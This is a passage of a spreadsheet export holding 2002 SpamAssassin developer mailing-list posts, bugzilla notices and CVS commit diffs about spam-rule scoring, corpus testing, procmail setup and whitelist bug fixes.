&gt; more.Probably a few, those seemed like the best prospects to me.&gt; BTW do you agree with the proposed methodology (ie. remove the rules and
&gt; bugzilla each one?)I only want a bugzilla ticket for each one if people are okay with
quick WONTFIX closes on the ones deemed unworthy of recovery.If you could put the stats for each rule in the ticket somehow (should
be automatable with email at the very least), it would help.Dan
</t>
  </si>
  <si>
    <t xml:space="preserve">Justin Mason  writes:&gt; hmm. also I think I've found some cases where it's hitting on fetchmail
&gt; Received hdrs.  that's bad.  so it could be fixed....fetchmail adds Received headers?  That seems wrong.  I'll open a bug
to investigate.  Can you attach some examples?&gt; yeah, will do -- somehow.  pity the bugzilla doesn't allow email
&gt; submissions...Agreed.  At least you can add information with email.- Dan
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 16 Sep 2002, Justin Mason wrote:&gt;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entirely.So Simon is attempting to get SA to run flawlessly, because then it can't
tickle the procmail bug.  This isn't a fix, it's a band-aid, but because
he apparently doesn't have the option of installing a newer procmail ...
</t>
  </si>
  <si>
    <t xml:space="preserve">jm@jmason.org (Justin Mason) writes:&gt; Folks who've been hacking on the DNSBLs: would it be worthwhile commenting
&gt; this in HEAD, seeing as it only gets .77 anyway?
&gt; 
&gt; Sounds like the (a) broken server and (b) low hitrate combine to make it
&gt; not-so-useful IMO.No, in my opinion, it's purely a bug in SA (or the libraries we use,
which is the same thing) that we don't handle outages of network
services better.The rule is useful and it does help reduce spam, we should keep it.  I
have a feeling the DNSBL rules will cluster a bit more heavily around
the 1.0 to 2.0 range once we start using the new GA on them.Also, 0.77 was a slightly conservative number.  Since I didn't have
real-time data, I typically used the lower or median number of different
periods (most recent month, two months, six months), depending on the
trend of the period data (better performance for recent messages -&gt;
favor recent scores, worse performance for recent messages -&gt; favor
lowest scores, never pick the highest number unless the rule was very
accurate and the highest number was for the most recent data).Dan
</t>
  </si>
  <si>
    <t xml:space="preserve">
Gary Funck said:
&gt; I thought the "&gt;&gt; /perllocal.pod" line looked odd. Is it normal to write
&gt; documentation into the root directory? (). Is there some Make parameter, o
&gt; r
&gt; environment variable that should've been set when I ran "make"?an issue for Razor folks I think.&gt; It seems that by registering that I avoided the error path noted in my previo
&gt; us
&gt; e-mail where DNS::Net::Resolver was called, but does not exist in my Perl
&gt; hierarchy.  Here's the new output from SA ans Razor2:
looks good.
&gt; Question: if we use spamassassin on a per-user basis, invoked from procmailrc
&gt; ,
&gt; will each user have to run "razor-admin -register" first? Is there way to
&gt; register with Razor just once per system?If you use spamd with the -H option and provide a shared directory for
the razor config files to be written to.  RTFM for more details...--j.</t>
  </si>
  <si>
    <t xml:space="preserve">
Matt Kettler said:
&gt; Ok, first, the important stuff. Happy birthday Justin (a lil late, but
&gt; oh well)cheers!&gt; a 13% miss ratio on the spam corpus at 5.0 seems awfully high, although 
&gt; that nice low FP percentage is quite nice, as is the narrow-in of average 
&gt; FP/FN scores compared to 2.40.As Dan said -- it's a hard corpus, made harder without the spamtrap data.Also -- and this is an important point -- those measurements can't be
directly compared, because I changed the methodology.  In 2.40 the scores
were evolved on the entire corpus, then evaluated using that corpus; ie.
there was no "blind" testing, and the scores could overfit and still
provide good statistics.In 2.42, they're evaluated "blind", on a totally unseen set of messages,
so those figures would be a lot more accurate for real-world use.--j.</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "v" == vernon   writes:v&gt; Some of my "Security Violations" and "Unusual System Events" are being 
v&gt; tagged as SPAM by SpamAssassin. How do I get SA to ignore these messages?whitelists.  you *really* have to white list any message source that
discusses or is used to report spam, else the reports will be marked
as spam, given that they have the spam indicators in them, usually...This is the *only* whitelisting I use.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</si>
  <si>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Yes, I think some others, (mgm?) have spamtrap data in there too.
&gt;My corpus is about 50% spamtrap spam at any given time. Let me know if I
should leave that out next time, I do keep it separate. My spamtraps are
pretty clean of viruses and bounce messages most of the time.--
Michael Moncur  mgm at starlingtech.com  http://www.starlingtech.com/
"Lack of money is no obstacle. Lack of an idea is an obstacle." --Ken Hakuta
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; &gt; Would someone please enlighten me on dependencies / pre-requisites
&gt; &gt; for installation in FreeBSD. The 'official' documentation isn't
particularly
&gt; &gt; explicit about this stuff .... eg 'procmail' is mentioned but without
saying
&gt; &gt; whether or not its essential, &amp; no info provided on whether GNUmake is
&gt; &gt; required or if standard BSD 'make' is OK.
&gt;
&gt; I thought we were quite good about it, in the README file!
&gt;
&gt; procmail is essential *if* you're using (a) SpamAssassin for local
&gt; delivery, (b) not using a milter, and (c) not using a Mail::Audit
&gt; script instead.  So probably yes.
&gt;
&gt; BSD make is OK, if Perl generally uses it to build Perl modules.
&gt; SpamAssassin is just anotehr Perl module in that respect.
&gt;
Back to this stuff again  ..... searched high &amp; low but definitely nothing
on this system even vaguely resembling a README file for spamassassin.
I have procmail installed but having major problems comprehending the
setup .... would appreciate info on any 'simple english' HOWTo
</t>
  </si>
  <si>
    <t xml:space="preserve">
"Michael Moncur" said:&gt; My corpus is about 50% spamtrap spam at any given time. Let me know if I
&gt; should leave that out next time, I do keep it separate. My spamtraps are
&gt; pretty clean of viruses and bounce messages most of the time.IMO spamtrap data that's well-cleaned and monitored is fine.To my mind there's 3 types of spamtraps:  1. old user addresses, recycled into spamtraps when the user closes
    the account  2. old user addresses, recycled into spamtraps several months after the
    user closes the account, scanned for newsletters, unsubscribed
    from them etc.  3. real spamtrap addresses to trap website crawlers.The latter 2 are the most effective, but #1 is a real PITA; it takes lots
of maintainance to avoid ham getting in there.  Some of my spamtrap data
had a few 1's contributed by ISPs, and I hadn't spent enough time sifting
for legit mail that was slipping through.  So I felt better leaving
them out for this run, apart from what I'd hand-cleaned.--j.</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.hughes-family.org/bugzilla/show_bug.cgi?id=828jm@jmason.org changed:           What    |Removed                     |Added
----------------------------------------------------------------------------
             Status|ASSIGNED                    |RESOLVED
         Resolution|                            |FIXED------- Additional Comments From jm@jmason.org  2002-09-21 16:35 -------
OK, this should now be considered fixed, I should think.   Domain Name: SPAMASSASSIN.ORG
   Name Server: NS.PEREGRINEHW.COM
   Name Server: NS1.RTS.COM.AU
   Name Server: NS2.RTS.COM.AU
   Name Server: NS3.RTS.COM.AU
   Name Server: FAMILY.ZAWODNY.COMetc.-------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</si>
  <si>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http://www.hughes-family.org/bugzilla/show_bug.cgi?id=1008jm@jmason.org changed:           What    |Removed                     |Added
----------------------------------------------------------------------------
             Status|NEW                         |RESOLVED
         Resolution|                            |INVALID------- Additional Comments From jm@jmason.org  2002-09-21 16:36 -------
Hi David --I'm afraid this bug-tracking system is only used for the open-source
SpamAssassin (the UNIX one ;).   You need to talk to somebody
at deersoft.com instead.-------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</si>
  <si>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http://www.hughes-family.org/bugzilla/show_bug.cgi?id=886------- Additional Comments From jm@jmason.org  2002-09-21 16:37 -------
I'd prefer to wait and see if spammers do anything about it.  my
guess is they will not, as it'd mean modifying their spamware to
send &gt;1 msg per recipient.I vote WONTFIX as a result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</si>
  <si>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http://www.hughes-family.org/bugzilla/show_bug.cgi?id=813------- Additional Comments From jm@jmason.org  2002-09-21 16:39 -------
Dan, BTW, is there any code from this that we can get checked in?
I'd love to mess around with it a bit.-------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</si>
  <si>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http://www.hughes-family.org/bugzilla/show_bug.cgi?id=1012------- Additional Comments From easmith@beatrice.rutgers.edu  2002-09-21 16:41 -------
I like this idea, but from my reading - part of my dissertation research -
on GAs (or, in this case, more precisely "Evolutionary Programming", since
the parameters are non-binary and the major operator is mutation, not
crossover), you do need to keep in mind that the more interactions there are
between different variables, the better-tweaked the GA/EA will need to be,
especially to avoid local optima (which may have been the problem with the
suspiciously-high "anti-ratware" USER_AGENT scores). From past results,
what's needed are one or more of the below:
        A. Determine mutational parameters by adapted-scores themselves,
           with variation on a per-original score basis; ideally, allow
           for having "correlated" mutations - in other words, have a
           mechanism in place for trying out changes to a bunch of scores at
           once, with them all moving about the same amount (albeit possibly
           in different directions) - one means to do this is found in the
           "Evolutionary Strategies" of Schwefel;
        B. Adapt the probability of a mutation taking place depending on how
           well previous mutation tries have done -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</si>
  <si>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
"Mike Bostock" said:&gt; Received: from tracking2 (tracking2.roving.com [10.20.40.142])
&gt; 	by ccm01.roving.com (Postfix) with ESMTP id 4696633ED4
&gt; 	for ; Sun, 22 Sep 2002 17:57:03 -0400 (EDT)
&gt; X-Mailer: Roving Constant Contact
&gt; 5.0.Patch121c.P121C_SchedEnhancement_09_05_02
&gt; (http://www.constantcontact.com)
&gt; 
&gt; Is worthy of attention and a rule - if you go to their web site it
&gt; would appear that they are in the business of email mass marketing. 
&gt; Unfortunately their mailing to me got through Spamassassin :-(Interesting -- I haven't seen anything from these guys in about a year,
but looking at your hdr they're still doing it.OK, come up with an X-Mailer rule that hits your mails, and we'll put it
in testing...--j.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</si>
  <si>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No I was just a little confused because I'm running procmail on a gateway
and sits between the external sendmail box and internal exchange bridgehead
server.  So there isn't any delivery to the local system.The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gateway.-Jason-----Original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</si>
  <si>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This is just an semi-educated guess - if I'm wrong, someone please correct
me!Spamd setuid's to the user running spamc. Since you're calling spamc from a
global procmailrc file, it's being run as root (most likely). If called as
root, spamd won't open user_prefs files.&gt;&gt;From the spamc man page:       -u username
           This argument has been semi-obsoleted.  To have spamd use
           per-user-config files, run spamc as the user whose config
           files spamd should load.  If you're running spamc as some
           other user though (eg. root, mail, nobody, cyrus, etc.)
           then you can still use this flag.
The solution is to set DROPPRIVS=yes in /etc/procmailrc, just before running
spamc. From the procmailrc man page:       DROPPRIVS   If set to `yes' procmail will drop all privileges
                   it might have had (suid or sgid).  This  is  only
                   useful  if  you  want  to guarantee that the bottom
                   half of the /etc/procmailrc file is executed on
                   behalf of the recipient.
I hope that helps, and I also hope it's right!St-
| -----Original Message-----
| From: spamassassin-talk-admin@example.sourceforge.net
| [mailto:spamassassin-talk-admin@lists.sourceforge.net]On Behalf Of
| Cheryl L. Southard
| Sent: Tuesday, September 24, 2002 2:28 PM
| To: spamassassin-talk@example.sourceforge.net
| Subject: [SAtalk] user_prefs ignored
|
|
| Hi All,
|
| I am running SpamAssassin 2.41 with procmail as my local delivery agent
| with sendmail.  I use spamc/spamd so that it runs site-wide from
| /etc/procmailrc.
|
| spamd is run as root with the flags "-d -a -c", and spamc isn't run with
| any flags.
|
| When I was testing the program, I deployed spamc from my personal
| ~/.procmailrc file, my ~/.spamassassin/user_prefs file was read each time.
| I can see this because I have a non-default "required_hits" value which
| gets reported in every e-mail on the "X-Spam-Status" line.
|
| Now that I run spamc from the global /etc/procmailrc file, my
| ~/.spamassassin/user_prefs file is no longer being read or processed from
| e-mails from outside computers.  The "required_hits" value gets set back
| to the one in /etc/mail/spamassassin/local.cf.  However, if I send local
| e-mail, my user_prefs file is read and processed correctly.
|
| Does anyone know how to fix this problem?  if this is a spamassassin or
| procmail bug?
|
| Thanks,
|
| Cheryl
|
| --
| Cheryl Southard
| cld@astro.caltech.edu
|
|
| -------------------------------------------------------
| This sf.net email is sponsored by:ThinkGeek
| Welcome to geek heaven.
| http://thinkgeek.com/sf
| _______________________________________________
| Spamassassin-talk mailing list
| Spamassassin-talk@lists.sourceforge.net
|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</si>
  <si>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jm@jmason.org (Justin Mason) writes:&gt; except for 1 thing: defanged MIME messages.  that's a big problem.
&gt; but if you didn't just *remove* the headers and instead reverted
&gt; back to the X-Spam-Prev versions, it'd more-or-less work.
&gt; 
&gt; (BTW fixed the downloads page ;)&amp;check now un-defangs MIME -- it was screwing up some of my mass-check
results (where SA-markup was present, yes).If there ever was a warning about SA-markup in mass-check, it never
worked for me.Dan
</t>
  </si>
  <si>
    <t xml:space="preserve">I just picked up Razor SDK 2.03 and  2.14 agents from the the razor site.
I am using SuSe 7.3 - intalled SDK with no problems. All tests passed.When I try to make the 2.14 agents I get all kinds of errors. In
particuliar it says the net::dns is missing. But it seems to be there. The
SDK test passes it.Any help would be appreciated.Doug-------------------------------------------------------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</si>
  <si>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Sep 25,  7:35pm, Daniel Quinlan wrote:
&gt; Allen Smith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thoseAh. As in getting a directory listing of the corpus server and doing some
downloads? OK, done.&gt; and you can create your own tmp/scores.h and tmp/tests.h.Good point. Will report back on my results.	-Allen-- 
Allen Smith			http://cesario.rutgers.edu/easmith/
September 11, 2001		A Day That Shall Live In Infamy II
"They that can give up essential liberty to obtain a little temporary
safety deserve neither liberty nor safety." - Benjamin Franklin
</t>
  </si>
  <si>
    <t xml:space="preserve">Unable to find user: 
Please make sure the address is correct and resend your mail.
</t>
  </si>
  <si>
    <t xml:space="preserve">
SpamTalk said:
&gt; Probably better than the "spam phrases" approach would be the database
&gt; approach as currently used for white/black listing.
&gt; Any way to tie that to an XML retrieval from a list of central repositories?
&gt; Does mySQL do replication? A properly done XML would let us eyeball the list
&gt; as well as use it to keep the database up to date.
&gt; Another idea: could we synthesize an RBL so that
&gt; http://www.spammer.com/spam/web/bug/ becomes spam.web.bug.x.www.spammer.com
&gt; for a reverse lookup? It is going to get tricky, how to specify a randomized
&gt; intermediate directory?A good plan, needs an implementation though:         http://bl.reynolds.net.au/ksi/email/hmm. seems down to me.  Basically it's a plan to store hash sums of
URLs/phone numbers found in spam in a DNSBL, for apps like SpamAssassin to
look up.  A little like spamcop's "spamvertized URL" list...--j.
-------------------------------------------------------
This sf.net email is sponsored by: DEDICATED SERVERS only $89!
Linux or FreeBSD, FREE setup, FAST network. Get your own server 
today at http://www.ServePath.com/indexfm.htm
_______________________________________________
Spamassassin-talk mailing list
Spamassassin-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">jm@jmason.org (Justin Mason) writes:&gt; Yes -- 50% of the entire set for training and 50% for evaluation.Once you've settled on the final method for any one release, why not
use 100% of the data for a final run?
Dan
</t>
  </si>
  <si>
    <t xml:space="preserve">Justin Mason wrote:&gt;&gt; Interestingly, some of these seem (apparently) to be encrypted versions of
&gt;&gt; the recipient email address.  To see this, ROT13 yr address and grep your
&gt;&gt; spam archive.  There'll be at least 1 hit.Theo Van Dinter  writes:&gt; Hmmm.  I'm surprised at these results, especially since I should be
&gt; seeing some false positives...  Not a lot of matches though. :(Still worthwhile -- 1.257% is not that bad.  :-)My results:  OVERALL%   SPAM% NONSPAM%     S/O    RANK   SCORE  NAME
    11774     4079     7695    0.35    0.00    0.00  (all messages)
  100.000   34.644   65.356    0.35    0.00    0.00  (all messages as %)
    0.195    0.564    0.000    1.00    0.75    1.00  T_ROT13_EMAIL_3
    0.161    0.466    0.000    1.00    0.73    1.00  T_ROT13_EMAIL_2
    0.161    0.466    0.000    1.00    0.73    1.00  T_ROT13_EMAILThe interesting thing is that these hits all seem to be rot13 versions
of the To: address.  If we ever start getting FPs (or if anyone is
worried), we could make it an eval test for rot13 of the To: address
(turning non-word characters into "." characters in the regular
expression).At the same time, it might be worth testing for username in HTML
comments.  I found some  types in HTML comments, but I
haven't seen enough hits so far to bother (however, I did add a really
good test for email addresses in comments).Dan
</t>
  </si>
  <si>
    <t xml:space="preserve">Update of /cvsroot/spamassassin/spamassassin/lib/Mail
In directory usw-pr-cvs1:/tmp/cvs-serv4019/lib/MailModified Files:
      Tag: b2_4_0
	SpamAssassin.pm 
Log Message:
fixed bug 1033: -R and -W were not respecting auto_whitelist_pathIndex: SpamAssassin.pm
===================================================================
RCS file: /cvsroot/spamassassin/spamassassin/lib/Mail/SpamAssassin.pm,v
retrieving revision 1.115.2.11
retrieving revision 1.115.2.12
diff -b -w -u -d -r1.115.2.11 -r1.115.2.12
--- SpamAssassin.pm	24 Sep 2002 18:51:37 -0000	1.115.2.11
+++ SpamAssassin.pm	2 Oct 2002 13:19:28 -0000	1.115.2.12
@@ -696,7 +696,13 @@
 }
 ###########################################################################
-# non-public methods.
+
+=item $f-&gt;init ($use_user_prefs)
+
+Read and parse the current configuration. C&lt;$use_user_prefs&gt; can
+be C&lt;0&gt; (do not read user preferences) or C&lt;1&gt; (do).
+
+=cut
 sub init {
   my ($self, $use_user_pref) = @_;
@@ -767,6 +773,9 @@
   # TODO -- open DNS cache etc. if necessary
 }
+
+###########################################################################
+# non-public methods.
 sub read_cf {
   my ($self, $path, $desc) = @_;-------------------------------------------------------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</si>
  <si>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
In directory usw-pr-cvs1:/tmp/cvs-serv4019Modified Files:
      Tag: b2_4_0
	spamassassin.raw 
Log Message:
fixed bug 1033: -R and -W were not respecting auto_whitelist_pathIndex: spamassassin.raw
===================================================================
RCS file: /cvsroot/spamassassin/spamassassin/spamassassin.raw,v
retrieving revision 1.68.2.12
retrieving revision 1.68.2.13
diff -b -w -u -d -r1.68.2.12 -r1.68.2.13
--- spamassassin.raw	24 Sep 2002 18:51:37 -0000	1.68.2.12
+++ spamassassin.raw	2 Oct 2002 13:19:28 -0000	1.68.2.13
@@ -216,6 +216,9 @@
   if ($@) { warn $@; }
   if ($doing_whitelist_operation) {
+    # read the config!
+    $spamtest-&gt;init (1);
+
     if ($opt{'add-to-whitelist'}) {
       $spamtest-&gt;add_all_addresses_to_whitelist ($mail);
     } elsif ($opt{'remove-from-whitelist'})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</si>
  <si>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/cvsroot/spamassassin/spamassassin/t
In directory usw-pr-cvs1:/tmp/cvs-serv4019/tModified Files:
      Tag: b2_4_0
	db_based_whitelist.t db_based_whitelist_ips.t 
Log Message:
fixed bug 1033: -R and -W were not respecting auto_whitelist_pathIndex: db_based_whitelist.t
===================================================================
RCS file: /cvsroot/spamassassin/spamassassin/t/db_based_whitelist.t,v
retrieving revision 1.6.4.1
retrieving revision 1.6.4.2
diff -b -w -u -d -r1.6.4.1 -r1.6.4.2
--- db_based_whitelist.t	24 Sep 2002 18:51:38 -0000	1.6.4.1
+++ db_based_whitelist.t	2 Oct 2002 13:19:28 -0000	1.6.4.2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ok_all_patterns();Index: db_based_whitelist_ips.t
===================================================================
RCS file: /cvsroot/spamassassin/spamassassin/t/db_based_whitelist_ips.t,v
retrieving revision 1.1.2.1
retrieving revision 1.1.2.2
diff -b -w -u -d -r1.1.2.1 -r1.1.2.2
--- db_based_whitelist_ips.t	24 Sep 2002 18:51:38 -0000	1.1.2.1
+++ db_based_whitelist_ips.t	2 Oct 2002 13:19:29 -0000	1.1.2.2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data/spam/007", \&amp;patterns_run_cb);
+ok (sarun ("-L -a -t &lt; data/spam/007", \&amp;patterns_run_cb));
 ok_all_patterns();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</si>
  <si>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
In directory usw-pr-cvs1:/tmp/cvs-serv4429Modified Files:
	spamassassin.raw 
Log Message:
fixed bug 1033: -R and -W were not respecting auto_whitelist_pathIndex: spamassassin.raw
===================================================================
RCS file: /cvsroot/spamassassin/spamassassin/spamassassin.raw,v
retrieving revision 1.76
retrieving revision 1.77
diff -b -w -u -d -r1.76 -r1.77
--- spamassassin.raw	26 Sep 2002 17:14:59 -0000	1.76
+++ spamassassin.raw	2 Oct 2002 13:20:32 -0000	1.77
@@ -218,6 +218,9 @@
   if ($@) { warn $@; }
   if ($doing_whitelist_operation) {
+    # read the config!
+    $spamtest-&gt;init (1);
+
     if ($opt{'add-to-whitelist'}) {
       $spamtest-&gt;add_all_addresses_to_whitelist ($mail);
     } elsif ($opt{'remove-from-whitelist'})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</si>
  <si>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/cvsroot/spamassassin/spamassassin/rules
In directory usw-pr-cvs1:/tmp/cvs-serv4429/rulesModified Files:
	50_scores.cf 60_whitelist.cf 
Log Message:
fixed bug 1033: -R and -W were not respecting auto_whitelist_pathIndex: 50_scores.cf
===================================================================
RCS file: /cvsroot/spamassassin/spamassassin/rules/50_scores.cf,v
retrieving revision 1.226
retrieving revision 1.227
diff -b -w -u -d -r1.226 -r1.227
--- 50_scores.cf	1 Oct 2002 09:53:43 -0000	1.226
+++ 50_scores.cf	2 Oct 2002 13:20:32 -0000	1.227
@@ -611,7 +611,7 @@
 score PORN_GALLERIES                 1.000
 score RATWARE_LC_OUTLOOK             1.000
 score SHORT_RECEIVED_LINE            4.300
-score SAFEGUARD_NOTICE               -3.300
+score SAFEGUARD_NOTICE               3.300
 score MAILMAN_CONFIRM                -1.000
 score SIGNIFICANT                    1.000
 score RATWARE_DIFFOND                2.200Index: 60_whitelist.cf
===================================================================
RCS file: /cvsroot/spamassassin/spamassassin/rules/60_whitelist.cf,v
retrieving revision 1.31
retrieving revision 1.32
diff -b -w -u -d -r1.31 -r1.32
--- 60_whitelist.cf	11 Sep 2002 21:31:35 -0000	1.31
+++ 60_whitelist.cf	2 Oct 2002 13:20:33 -0000	1.32
@@ -65,3 +65,4 @@
 # Friends re-united (popular UK old-school-network)
 whitelist_from_rcvd *@friendsreunited.co.uk                 friendsreunited.co.uk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</si>
  <si>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/cvsroot/spamassassin/spamassassin/t
In directory usw-pr-cvs1:/tmp/cvs-serv4429/tModified Files:
	db_based_whitelist.t db_based_whitelist_ips.t 
Log Message:
fixed bug 1033: -R and -W were not respecting auto_whitelist_pathIndex: db_based_whitelist.t
===================================================================
RCS file: /cvsroot/spamassassin/spamassassin/t/db_based_whitelist.t,v
retrieving revision 1.7
retrieving revision 1.8
diff -b -w -u -d -r1.7 -r1.8
--- db_based_whitelist.t	26 Sep 2002 17:15:04 -0000	1.7
+++ db_based_whitelist.t	2 Oct 2002 13:20:33 -0000	1.8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ok_all_patterns();Index: db_based_whitelist_ips.t
===================================================================
RCS file: /cvsroot/spamassassin/spamassassin/t/db_based_whitelist_ips.t,v
retrieving revision 1.2
retrieving revision 1.3
diff -b -w -u -d -r1.2 -r1.3
--- db_based_whitelist_ips.t	26 Sep 2002 17:15:04 -0000	1.2
+++ db_based_whitelist_ips.t	2 Oct 2002 13:20:33 -0000	1.3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data/spam/007", \&amp;patterns_run_cb);
+ok (sarun ("-L -a -t &lt; data/spam/007", \&amp;patterns_run_cb));
 ok_all_patterns();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</si>
  <si>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
Malte S. Stretz said:
&gt; 1046 is fixed. But what about
&gt; 1011 (add a notice about IRIX and -m to the docs),
&gt; 1031 (cygwin's EXE_EXT),
&gt; 1043 (a cosmetic but rather disturbing one ;-),all now fixed!&gt; 1004 (TO_MALFORMED borken),WONTFIX ;)&gt; 1006 (packaging related)?eh, will leave this for 2.50. ;)OK, if there's nothing moderately serious shown up tonight, I'll release
it tomorrow AM (GMT).--j.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</si>
  <si>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eh? any reason why?  wasn't causing any trouble for me, and
&gt; seems like a good idea.Because every time someone submitted a bug, they'd get a response
saying "Message is held for moderator because of implicit message
destination" or something like that. It annoyed users, it annoyed me,
and Justin, you never actually got around to accepting the messages :-)-- 
Duncan Findlay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</si>
  <si>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http://www.hughes-family.org/bugzilla/show_bug.cgi?id=1049felicity@kluge.net changed:           What    |Removed                     |Added
----------------------------------------------------------------------------
             Status|NEW                         |RESOLVED
         Resolution|                            |FIXED------- Additional Comments From felicity@kluge.net  2002-10-03 13:26 -------
Hmmm, my last message doesn't seem to have made it into bugzilla yet.I've committed a patch to fix this problem in both HEAD and b2_4_0.  The last
message explains what the problem was and what the patch does to fix it.-------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</si>
  <si>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http://www.hughes-family.org/bugzilla/show_bug.cgi?id=1006jm@jmason.org changed:           What    |Removed                     |Added
----------------------------------------------------------------------------
             Status|NEW                         |ASSIGNED------- Additional Comments From jm@jmason.org  2002-10-03 13:29 -------
1. Use of $Config is gradually being removed, thankfully.  I don't want
to see any of that stuff in there if it acn be avoided, as different
perl versions jsut vary so much in that stuff.2. perl has no concept of where the rules could be -- unless they're in
the perl libdir (/usr/lib/perl5/site_perl/5.x.x/foo).  Perl does not
know about the existence of /usr/share or /etc.  Used to use /usr/lib/perl5
for storing rules, and it was actually *much worse* than it is now. So
we need an out-of-band way to tell SA where to find this stuff. that's
the problem!3. try "perl Makefile.PL &lt; /dev/null" to allow bots to build it.I think I might be missing some details of what you're peeved about,
though... could you elaborate specifically?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</si>
  <si>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http://www.hughes-family.org/bugzilla/show_bug.cgi?id=1046------- Additional Comments From spamassassin-contrib@msquadrat.de  2002-10-03 13:57 -------
&gt; I've thought about this and PM_FILTER needs to die. I've now tried  
&gt; multiple ways to make it just transparently work on 5.00503 and failed.  
&gt; If anyone has any bright ideas please jump in. 
&gt;  
&gt; You see anyone upgrading from the CPAN shell will get a failure on the line: 
&gt;  
&gt;    use ExtUtils::MakeMaker 5.45; 
Quite some modules from CPAN do have a line like this nowadays (I think or 
read so somewhere, respectively). And the Perl error message is very clear: 
"ExtUtils::MakeMaker version 5.45 required--this is only version 5.4302 at 
Makefile.PL line 2." 
&gt; Because it never gets chance to reach a "WriteMakefile" line with a  
&gt; PREREQ_PM =&gt; { ExtUtils::MakeMaker =&gt; 5.45 } option. So the CPAN shell  
&gt; can't automatically upgrade this module. I cannot think of any way  
&gt; around this. 
I could think of a solution: We could remove the "use" line and add the 
version to PREREQ_PM. After WriteMakefile() we could add the lines 
  require ExtUtils::MakeMaker; 
  ExtUtils::MakeMaker-&gt;VERSION(5.45); 
to do per hand what 'use ExtUtils::MakeMaker 5.45' does automagically; `perl 
Makefile.PL` will die with a "Uncaught exception from user code: 
ExtUtils::MakeMaker version 5.45 required--this is only version 5.4302 at 
Makefile.PL line 103." there but we've got a Makefile. But I don't know if 
CPAN will run the make anyway... 
&gt; To add insult to injury, the PM_FILTER part gets run during pm_to_blib,  
&gt; which would be fine, except ExtUtils::MakeMaker doesn't let you write a  
&gt; MY::pm_to_blib - it's non-overridable! So even though we could  
&gt; potentially copy the 5.45 ExtUtils::Install::pm_to_blib code somewhere  
&gt; into the spamassassin codebase (I tried that first), we can't cause the  
&gt; Makefile to call our code :-( 
We could call the preprocessor on install time. That's not a very clean 
approach but could work. 
We can also overwrite pm_to_blib in the Makefile directly per postamble. We 
already have a useless line "pm_to_blib: spamassassin doc/.made" there. Adding 
some commands in this section gives some make warnings ("Makefile:933: 
warning: overriding commands for target `pm_to_blib' Makefile:877: warning: 
ignoring old commands for target `pm_to_blib'") but does work. Not a very good 
solution either. 
&gt; So I'm *strongly* against the current use of ExtUtils::MakeMaker 5.45  
&gt; usage (if this were an Apache project this would be my veto vote), and  
&gt; really hope we can find another way. 
The "use MakeMaker::..." error message is IMHO quite clear, so I think it's ok 
to require the user to do a manual update of ExtUtils::MakeMaker before the SA 
installation. But that's just my opinion ;-) 
I'll ask on makemaker@perl.org for the best solution. They should know.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</si>
  <si>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http://www.hughes-family.org/bugzilla/show_bug.cgi?id=1006-------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</si>
  <si>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http://www.hughes-family.org/bugzilla/show_bug.cgi?id=960spamassassin-contrib@msquadrat.de changed:           What    |Removed                     |Added
----------------------------------------------------------------------------
             Status|NEW                         |RESOLVED
         Resolution|                            |WONTFIX------- Additional Comments From spamassassin-contrib@msquadrat.de  2002-10-03 14:16 -------
I think it's ok to close this one? Comment is a valid, albeit seldom used RFC 
2822 header...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</si>
  <si>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http://www.hughes-family.org/bugzilla/show_bug.cgi?id=739spamassassin-contrib@msquadrat.de changed:           What    |Removed                     |Added
----------------------------------------------------------------------------
             Status|NEW                         |RESOLVED
         Resolution|                            |WONTFIX------- Additional Comments From spamassassin-contrib@msquadrat.de  2002-10-03 14:17 -------
Relieving Dan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</si>
  <si>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http://www.hughes-family.org/bugzilla/show_bug.cgi?id=779spamassassin-contrib@msquadrat.de changed:           What    |Removed                     |Added
----------------------------------------------------------------------------
             Status|NEW                         |RESOLVED
         Resolution|                            |FIXED------- Additional Comments From spamassassin-contrib@msquadrat.de  2002-10-03 14:21 -------
I think INVALID_MSGID does what this rule was supposed to do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</si>
  <si>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http://www.hughes-family.org/bugzilla/show_bug.cgi?id=1052           Summary: bondedsender.com is a scam
           Product: Spamassassin
           Version: unspecified
          Platform: Other
               URL: http://www.bondedsender.com/
        OS/Version: other
            Status: NEW
          Severity: normal
          Priority: P2
         Component: Rules
        AssignedTo: spamassassin-devel@example.sourceforge.net
        ReportedBy: friedman+spamassassin@splode.com
The default score for bondedsender-certified domains is -10, but I do not
believe they should be trusted and encourage you to change the default.* I have been spammed by their customers.
* There is no documentation on their website about how I can complain about
  this and have their customers financially penalized for sending me unsolicited
  mail.
* What proof do any of us have that they really even do anything about it?
  Their contract is with their customers, not with us.This is a scam!  Don't trust them!-------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</si>
  <si>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http://www.hughes-family.org/bugzilla/show_bug.cgi?id=1052------- Additional Comments From rOD-spamassassin@arsecandle.org  2002-10-03 18:51 -------
Ignoring the conspiracy theories, can you supply examples of spam which was 
scored with RCVD_IN_BONDEDSENDER?  The only mail I have received which scored 
this were from Amazon.com.-------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</si>
  <si>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http://www.hughes-family.org/bugzilla/show_bug.cgi?id=1053           Summary: IMG tag based rules
           Product: Spamassassin
           Version: unspecified
          Platform: Other
        OS/Version: other
            Status: NEW
          Severity: enhancement
          Priority: P2
         Component: Eval Tests
        AssignedTo: spamassassin-devel@example.sourceforge.net
        ReportedBy: matt@nightrealms.com
Inspired by complaints about all-image or mostly-image spam that's
getting by SA, I've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(T_HTML_CONSEC_IMG*).===============The total area of all images is rather easy to compute: inside of
HTML::html_tests(), if an IMG tag has both the width and height
properties, then multiply them together and add the result to the
running total.OVERALL%   SPAM% NONSPAM%     S/O    RANK   SCORE  NAME
  15113     4797    10316    0.32    0.00    0.00  (all messages)
100.000   31.741   68.259    0.32    0.00    0.00  (all messages as %)
  0.635    2.001    0.000    1.00    0.81    0.01  T_HTML_IMAGE_AREA14
  0.417    1.313    0.000    1.00    0.78    0.01  T_HTML_IMAGE_AREA15
  0.331    1.042    0.000    1.00    0.76    0.01  T_HTML_IMAGE_AREA07
  0.245    0.771    0.000    1.00    0.74    0.01  T_HTML_IMAGE_AREA10
  0.238    0.750    0.000    1.00    0.74    0.01  T_HTML_IMAGE_AREA02
  0.225    0.709    0.000    1.00    0.74    0.01  T_HTML_IMAGE_AREA16
  0.126    0.396    0.000    1.00    0.70    0.01  T_HTML_IMAGE_AREA18
  0.119    0.375    0.000    1.00    0.70    0.01  T_HTML_IMAGE_AREA19
